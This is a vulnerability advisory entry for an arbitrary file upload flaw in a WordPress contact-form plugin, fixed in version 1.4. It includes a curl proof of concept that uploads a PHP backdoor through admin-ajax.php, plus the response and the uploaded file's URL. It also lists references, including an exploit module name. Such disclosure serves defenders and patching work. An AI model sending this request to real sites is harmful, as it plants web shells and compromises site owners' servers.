N-Media Website Contact Form with File Upload < 1.4 – Arbitrary File Upload | Plugin Vulnerabilities

Description

The "upload_file()" ajax function is affected from unrestricted file upload vulnerability.

Proof of Concept

curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.example.com/wp-admin/admin-ajax.php

Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}

http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php

Affects Plugins

website-contact-form-with-file-upload

Fixed in 1.4

References

Exploitdb

URL

exploit/unix/webapp/wp_nmediawebsite_file_upload

URL

https://packetstormsecurity.com/files/#131413/

URL

https://packetstormsecurity.com/files/#131514/

URL

https://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/

Miscellaneous

Submitter

Claudio Viviani

Submitter website

http://www.homelab.it

Submitter twitter

Verified

Yes

WPVDB ID

1a370efb-194c-4762-b06d-79b3bf02e90f

Timeline

Publicly Published

2015-04-12 (about 10 years ago)

Added

2015-04-13 (about 10 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2016-02-08

Title

WP User Frontend <= 2.3.10 - Unrestricted File Upload

Published

2024-02-28

Title

Avada | Website Builder For WordPress & WooCommerce < 7.11.5 - Authenticated (Contributor+) Arbitrary File Upload

Published

2021-06-28

Title

ProfilePress 3.0 - 3.1.3 - Arbitrary File Upload in File Uploader Component

Published

2025-04-08

Title

Processing Projects <= 1.0.2 - Authenticated (Shop Manager+) Arbitrary File Upload

Published

2025-12-09

Title

Video Merchant <= 5.0.4 - Cross-Site Request Forgery to Arbitrary File Upload